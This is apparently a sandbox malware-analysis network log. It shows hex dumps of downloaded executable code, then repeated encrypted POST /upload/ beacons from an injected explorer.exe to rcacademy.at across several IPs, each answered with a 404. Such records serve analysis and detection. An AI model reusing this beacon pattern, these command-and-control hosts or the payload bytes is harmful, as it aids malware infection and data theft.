                                                                                                                                  Dec 18, 2021 15:32:46.339462996 CET22295INData Raw: 09 ff 75 d4 51 ff d6 8b 45 d0 8b 0d e4 3e 43 00 3b cb 0f 84 90 16 00 00 50 51 ff d6 e9 87 16 00 00 6a f0 e8 fc 17 00 00 ff 75 d4 50 ff 15 00 81 40 00 85 c0 0f 85 6e 16 00 00 e9 6d 13 00 00 6a f0 e8 de 17 00 00 50 89 45 08 e8 e6 48 00 00 8b f0 3b
                                                                                                                                  Data Ascii: uQE>C;PQjuP@nmjPEH;tZj\VZHf>ff;u9]tEtulDuD;t=uu@uEf>FFf;u9]t-juhDNu@EjS6PQ
                                                                                                                                  Dec 18, 2021 15:32:46.339498043 CET22296INData Raw: 02 89 55 f0 89 75 08 e8 bc 12 00 00 59 89 55 f0 59 8b c8 8b 45 dc 83 f8 0d 0f 87 94 00 00 00 ff 24 85 4c 2d 40 00 03 f1 e9 5f 03 00 00 2b f1 e9 58 03 00 00 0f af ce eb 1a 3b cb 74 53 8b c6 99 f7 f9 8b f0 e9 43 03 00 00 0b ce eb 06 23 ce eb 02 33
                                                                                                                                  Data Ascii: UuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3Euj(jPVWUT@E5P@;tDH;
                                                                                                                                  Dec 18, 2021 15:32:46.339539051 CET22297INData Raw: 6a 02 e8 a9 0d 00 00 50 e8 70 48 00 00 8b f0 3b f3 74 13 ff 76 14 ff 75 f4 e8 70 44 00 00 ff 76 18 e9 51 f5 ff ff 8b 45 f4 66 89 1f 66 89 18 e9 04 09 00 00 6a ee e8 75 0d 00 00 8d 4d f0 89 45 c8 51 50 6a 0a e8 ca 48 00 00 ff d0 8b f0 8b 45 f4 66
                                                                                                                                  Data Ascii: jPpH;tvupDvQEffjuMEQPjHEf;fEVj@8@;EjHjEHuEVSuUt<EPEPh@uUt%EMtWCEMtuC]u49OCE
                                                                                                                                  Dec 18, 2021 15:32:46.339581966 CET22299INData Raw: b2 08 00 00 6a 33 8b f0 e8 69 08 00 00 3b f3 66 89 1f 0f 84 e6 03 00 00 8d 4d f0 c7 45 f0 00 08 00 00 51 8d 4d 08 57 51 53 50 56 ff 15 08 80 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e0 89 45 fc eb 74 ff
                                                                                                                                  Data Ascii: j3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]MtQWPV@SSSMSQWPV0@tEfV@"W>;Pj
                                                                                                                                  Dec 18, 2021 15:32:46.339621067 CET22300INData Raw: 89 55 f0 0f 83 bb fe ff ff 8b f7 8b 45 d8 69 f6 18 08 00 00 03 35 28 4f 43 00 3b c3 7c 1c 8b 0c 86 75 11 83 c6 18 56 ff 75 f4 e8 a4 3a 00 00 e9 8c 01 00 00 51 e9 fd 00 00 00 83 c9 ff 2b c8 89 4d d8 74 10 6a 01 e8 cf 02 00 00 59 89 55 f0 89 45 d4
                                                                                                                                  Data Ascii: UEi5(OC;|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]tPSSS9]tOCMOCu&:E+
                                                                                                                                  Dec 18, 2021 15:32:46.339656115 CET22302INData Raw: 19 6a 00 68 fa 00 00 00 6a 01 ff 75 08 ff 15 40 82 40 00 c7 45 0c 13 01 00 00 81 7d 0c 13 01 00 00 75 4c 8b 0d 18 ea 41 00 a1 24 aa 42 00 3b c8 72 02 8b c8 50 6a 64 51 ff 15 fc 80 40 00 50 8d 45 80 68 1c a0 40 00 50 ff 15 54 82 40 00 83 c4 0c 8d
                                                                                                                                  Data Ascii: jhju@@E}uLA$B;rPjdQ@PEh@PT@EPuD@EPhuh+3V39t$t B;tP8@5 B^95 BtV8^@;OCv#Vh/@Vjo5OC<@jP BP@^U(SV3W]]@8
                                                                                                                                  Dec 18, 2021 15:32:46.339895010 CET22303INData Raw: ce 2b 00 00 c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 18 a0 40 00 ff 15 60 81 40 00 c2 04 00 56 be 00 28 44 00 56 e8 bc 32 00 00 56 e8 75 29 00 00 85 c0 75 02 5e c3 56 e8 f2 28 00 00 56 e8 cb 25 00 00 56 68 00 20 44 00 e8 31 2b 00 00 5e c3 55 8b ec
                                                                                                                                  Data Ascii: +jjt$5@`@V(DV2Vu)u^V(V%Vh D1+^USVWj _3h]E@]@5@P]]u8Pff-SfE#fEsf
                                                                                                                                  Dec 18, 2021 15:32:46.339930058 CET22304INData Raw: 53 57 e8 de 28 00 00 a1 10 4f 43 00 ff b0 24 01 00 00 57 e8 4a 2b 00 00 57 e8 ea 20 00 00 3b c3 74 0a 50 ff 15 24 81 40 00 89 5d fc 66 ff 05 00 68 43 00 ff 4d f8 75 99 53 56 e8 a6 28 00 00 33 db e8 b4 00 00 00 ff 15 9c 82 40 00 39 5d fc 74 15 68
                                                                                                                                  Data Ascii: SW(OC$WJ+W ;tP$@]fhCMuSV(3@9]th u'!j@9OCtvEPj(@P$@t/EPh0@S @SSESPSuEE@j7.;tVj%SSStVj4@ujOCtEu
                                                                                                                                  Dec 18, 2021 15:32:46.394578934 CET22306INData Raw: 35 28 4f 43 00 85 c0 74 1b 8b f8 8b 06 85 c0 74 0a 50 8d 46 18 50 e8 0d 26 00 00 81 c6 18 08 00 00 4f 75 e7 5f 5e 5d 5b c3 56 be 00 3f 43 00 6a fe 56 e8 f1 25 00 00 56 ff 35 48 d2 42 00 ff 15 44 82 40 00 8b c6 5e c3 83 ec 10 b9 10 01 00 00 53 55
                                                                                                                                  Data Ascii: 5(OCttPFP&Ou_^][V?CjV%V5HBD@^SUVt$$;WaU|$$3GujUUUUW5HB@\$,uBHP5HBP@jW@%!=jWP@u5>C8@>C


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  43192.168.2.649883148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:48.501018047 CET22390OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bvyrwnlgbc.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 134
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:48.501070976 CET22390OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 28 6b 2c 90 f4 76 0b 75 76 1d b6 81
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA ,[(k,vuvL=9sMIqai}_eMNd
                                                                                                                                  Dec 18, 2021 15:32:49.046837091 CET22390INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:48 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  44192.168.2.649884211.59.14.9080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:49.309568882 CET22392OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://vbwucidikt.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 308
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:49.309607029 CET22392OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 29 6b 2c 90 f5 76 0b 75 35 24 fd fe
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[)k,vu5$uxG*i^ +>>X;5x-@J(vW^wpz`)=P.@[NEd+~TV8lteq\>
                                                                                                                                  Dec 18, 2021 15:32:50.492122889 CET22397INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:49 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  45192.168.2.649887148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:50.682429075 CET22398OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hwmsuk.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 125
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:50.682457924 CET22398OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2e 6b 2c 90 f5 76 0b 75 70 4f e0 fc
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[.k,vupOXI{vZ;~c(3it3
                                                                                                                                  Dec 18, 2021 15:32:51.224049091 CET22399INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:51 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  46192.168.2.649888190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:51.491143942 CET22403OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://qkybqrxqpe.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 320
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:51.491389036 CET22404OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2f 6b 2c 90 f5 76 0b 75 77 04 a7 ab
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[/k,vuwp.VL~jM$Z)=HxBv;PPrkM3kv3F7_B^xCx7`.[S"Afw:ZG6@y
                                                                                                                                  Dec 18, 2021 15:32:52.582041025 CET22404INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:52 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  47192.168.2.649889190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:52.834633112 CET22405OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://uaqwoemuq.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 296
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:52.834638119 CET22406OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2c 6b 2c 90 f5 76 0b 75 3d 59 f0 88
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[,k,vu=YHGCjvf_. [!+V&h@^/YNh@N ([IsaIbT=|pnyYC'l;]|nY%1
                                                                                                                                  Dec 18, 2021 15:32:53.844685078 CET22407INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:53 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  48192.168.2.649890211.59.14.9080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:54.224349022 CET22408OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nyexyommxu.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 218
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:54.224359035 CET22408OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2d 6b 2c 90 f5 76 0b 75 56 55 a8 e6
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[-k,vuVUR[b@Xi9\,Be%n ^a+JQJaQI5geG4J?>]0Q5}l
                                                                                                                                  Dec 18, 2021 15:32:55.139612913 CET22409INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:54 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  49192.168.2.649891218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:55.588864088 CET22410OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://jawmd.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 188
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:55.588871956 CET22410OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 22 6b 2c 90 f5 76 0b 75 41 34 aa 85
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -["k,vuA4ax`P0viYde,dRfKV=)<Q]US6V8!k~MAgxY
                                                                                                                                  Dec 18, 2021 15:32:56.463308096 CET22410INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:56 GMT
